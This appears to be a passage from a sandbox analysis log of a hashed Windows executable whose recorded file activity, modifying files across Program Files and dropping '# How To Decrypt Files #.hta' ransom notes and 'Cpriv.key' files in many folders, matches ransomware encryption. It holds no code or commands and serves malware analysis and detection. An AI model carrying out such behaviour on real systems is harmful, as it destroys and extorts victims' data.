de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\PDIR13F.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\Groove\ToolIcons\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\ps\LC_MESSAGES\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Internet Explorer\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0151067.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0183328.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Biscay\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ia\LC_MESSAGES\vlc.mo de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Calendar.Gadget\images\corner.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\THEMES14\RIPPLE\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\81.0.4044.129\default_apps\external_extensions.json de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.console_1.1.0.v20140131-1639.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-core.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\locale\org-openide-modules_ja.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-jmx_zh_CN.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jre7\lib\images\cursors\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO02028_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\jvm.lib de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-settings.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH02742G.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\WNTER_01.MID de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0157763.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Stationery\1033\NOTEBOOK.HTM de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\ink\1.7 de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\System\ado\msadox28.tlb de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0183574.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE01661_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\ru\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\si\LC_MESSAGES\vlc.mo de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Multimedia\MPP\MCIMPP.mpp de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\THEMES14\REFINED\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\org-netbeans-lib-profiler.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench.addons.swt.nl_zh_4.4.0.v20140623020002.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Document Themes 14\Paper.thmx de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolBMPs\ChessIconImages.bmp de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\button_mid_disable.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\rtf_bullets.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Common Files\System\ado\en-US\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\TRANSLAT\FRAR\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Sports\SceneButtonInset_Alpha2.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\BORDERS\MSART14.BDR de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\ko\LC_MESSAGES\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\intf\telnet.luac de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\divider-horizontal.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\lib\deployed\jdk15\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-heapdump.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\org-netbeans-modules-profiler-api.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0148757.JPG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\bg_TexturedBlue.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Templates\1033\Access\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Synchronization Services\ADO.NET\v1.0\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Reference Assemblies\Microsoft\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\ct.sym de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-options_zh_CN.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\org-netbeans-modules-print.xml_hidden de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\IN00956_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD15136_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\si\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\en-US\js\weather.js de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.swt.win32.win32.x86_64.nl_zh_4.4.0.v20140623020002.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\triggerActionExceptionHandlers.exsd de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\FlipPage\NavigationLeft_ButtonGraphic.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Memories\Title_mainImage-mask.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.rcp.ja_5.5.0.165303\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jre7\lib\management\jmxremote.password.template de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0105378.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00913_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\7-Zip\Lang\uz.txt de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\Bear_Formatted_RGB6_PAL.wmv de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBWIZ\DOTS.POC de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\requests\README.txt de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\LINES\BD21307_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBWIZ\SIDEBARBB.DPV de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_moon-waning-crescent_partly-cloudy.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Common Files\microsoft shared\VSTO\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\LINES\BD14594_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0384885.JPG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00289_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\bin\sysinfo.bat de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-tools.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.help_2.0.102.v20141007-2301\META-INF\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PAGESIZE\PGMN065.XML de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA00396_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBWIZ\CATWIZ.POC de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\sq\LC_MESSAGES\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Memories\button-overlay.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.databinding.property.nl_ja_4.4.0.v20140623020002.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0158477.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0185796.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\intf\luac.luac de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Full\full.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\ext\sunmscapi.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0287019.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\FORMS\1033\TASKREQS.ICO de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\bg_Groove.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Defender\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\en-US\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\OldAge\15x15dot.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jre7\lib\images\cursors\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\OIS_K_COL.HXK de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Common Files\microsoft shared\DAO\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\81.0.4044.129\Locales\hr.pak de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.0\WinFXList.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.rcp_5.5.0.165303\feature.properties de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\37.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\THEMES14\DEEPBLUE\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-lib-profiler-common_zh_CN.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Analysis Services\AS OLEDB\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBWIZ\DGLOGO.DPV de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\lg\LC_MESSAGES\vlc.mo de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_moon-full_partly-cloudy.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\ink\pt-BR\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\THEMES14\CONCRETE\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\ICU\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\7.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\nb\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107192.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\mr\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\my\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\17.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE02293_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD14829_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\plugins\stream_filter\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107730.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jre7\lib\calendars.properties de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\Calendar\CalendarToolIconImages.jpg de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0287643.JPG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\PDIR44F.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\LINES\BD21320_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Common Files\microsoft shared\Stationery\Stars.htm de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BD00173_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH02752G.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBWIZ\PICTPH.POC de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\id\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\Interface.zip de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\MSBuild\Microsoft\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\tile16.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\rtstreamsource.ax de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE03470_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-jvm.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\FD00403_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-swing-tabcontrol_ja.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\org-netbeans-modules-profiler-api.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\MediaCenter.Gadget\images\Gadget_WMC_LogoText.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0152608.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Solutions_Response.css de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\1036\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\CONVERT\1033\OLNOTER.FAE de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PAGESIZE\PGMN111.XML de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\square_s.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\eng.hyp de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Microsoft Office\Office14\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107502.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0239955.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-api-search_zh_CN.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft 